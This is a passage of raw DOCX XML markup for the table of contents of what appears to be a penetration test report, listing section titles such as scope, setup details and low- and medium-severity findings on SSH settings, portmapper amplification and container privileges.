            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42145122" w14:textId="54C13256" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562827" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Repeat Vulnerability Snapshot From Previous Test Cycle</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562827 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2079505B" w14:textId="4173B4E8" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562828" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Summary of Open Vulnerabilities</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562828 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="690C8614" w14:textId="2920CA57" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562829" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Scope</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562829 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="208090FF" w14:textId="7E46788B" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562830" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Setup Details</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562830 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F475768" w14:textId="2F8E0415" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562831" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Build/Version</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562831 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EF129A3" w14:textId="7B7711AD" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562832" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Network and System Details</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562832 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34D751F8" w14:textId="458440D1" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562833" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Container/PODs Details</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562833 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43706565" w14:textId="7F523F85" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562834" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>CLI Details</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562834 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49EEA669" w14:textId="0A706DD8" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562835" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>DETAILED PEN FINDINGS</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562835 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6372F85D" w14:textId="2FC3C3E0" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562836" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Network Security Vulnerability</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562836 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CAEE90B" w14:textId="5EDBDF10" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562837" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Public Target Systems open ports identified during network mapping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562837 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D2F1BFE" w14:textId="64571AEE" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562838" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>194309: Portmapper UDP based amplification attack</w:t>
        </w:r>
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:i/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> (Low)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562838 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4351C6AD" w14:textId="2F07B590" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562839" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>194311: Weak SSH Algorithms In Use</w:t>
        </w:r>
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:i/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> (Low)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562839 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="333FA7CD" w14:textId="3BB37B8C" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562840" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>194310: SSH Password-based Authentication Enabled</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_Toc200562840 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C152BDB" w14:textId="2225C164" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562841" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Container/PODs Security Vulnerability</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562841 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="434035DE" w14:textId="42779CEB" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562842" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>193926: Unrestricted Internet Access/Outbound Connections</w:t>
        </w:r>
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:i/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> (Medium)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562842 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="115F602A" w14:textId="7D07763D" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562843" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>193928: Containers Running with Root Privileges (Root Containers)</w:t>
        </w:r>
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:i/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> (Medium)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
